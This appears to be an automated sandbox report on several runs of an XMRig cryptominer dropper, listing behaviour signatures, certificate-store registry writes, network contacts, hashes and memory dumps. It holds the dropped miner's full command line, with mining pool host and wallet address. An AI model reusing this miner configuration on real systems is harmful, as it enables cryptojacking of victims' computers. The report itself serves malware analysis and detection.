N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3960-16-0x000001C2AB930000-0x000001C2AB950000-memory.dmp

memory/3960-17-0x000001C2AB970000-0x000001C2AB990000-memory.dmp

memory/3960-18-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-20-0x000001C2AD270000-0x000001C2AD290000-memory.dmp

memory/3960-19-0x000001C2AB990000-0x000001C2AB9B0000-memory.dmp

memory/3960-21-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-22-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-25-0x000001C2AD270000-0x000001C2AD290000-memory.dmp

memory/3960-24-0x000001C2AB990000-0x000001C2AB9B0000-memory.dmp

memory/3960-23-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-26-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-27-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-28-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-29-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-30-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-31-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-32-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-33-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-34-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-35-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-36-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-37-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-38-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-39-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-40-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-41-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-42-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-43-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-44-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-45-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-46-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-47-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-48-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-49-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-50-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-51-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-52-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-53-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-54-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-55-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-56-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-57-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-58-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-59-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-60-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-61-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-62-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-63-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-64-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-65-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-66-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-67-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-68-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-69-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-70-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-71-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-72-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-73-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-74-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-75-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-76-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-77-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-78-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-79-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-80-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-81-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-82-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-83-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

memory/3960-84-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1796s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 g.bing.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2252-16-0x000001E9223E0000-0x000001E922400000-memory.dmp

memory/2252-17-0x000001E923DE0000-0x000001E923E00000-memory.dmp

memory/2252-18-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-19-0x000001E923E00000-0x000001E923E20000-memory.dmp

memory/2252-20-0x000001E923E20000-0x000001E923E40000-memory.dmp

memory/2252-21-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-22-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-25-0x000001E923E20000-0x000001E923E40000-memory.dmp

memory/2252-24-0x000001E923E00000-0x000001E923E20000-memory.dmp

memory/2252-23-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-26-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-27-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-28-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-29-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-30-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-31-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-32-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-33-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-34-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-35-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-36-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-37-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-38-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-39-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-40-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-41-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-42-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-43-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-44-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-45-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-46-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-47-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-48-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-49-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-50-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-51-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-52-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-53-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-54-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-55-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-56-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-57-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-58-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-59-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-60-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-61-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-62-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-63-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-64-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-65-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-66-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-67-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-68-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-69-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-70-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-71-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-72-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-73-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-74-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-75-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-76-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-77-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-78-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-79-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-80-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-81-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-82-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-83-0x00007FF784160000-0x00007FF784C63000-memory.dmp

memory/2252-84-0x00007FF784160000-0x00007FF784C63000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
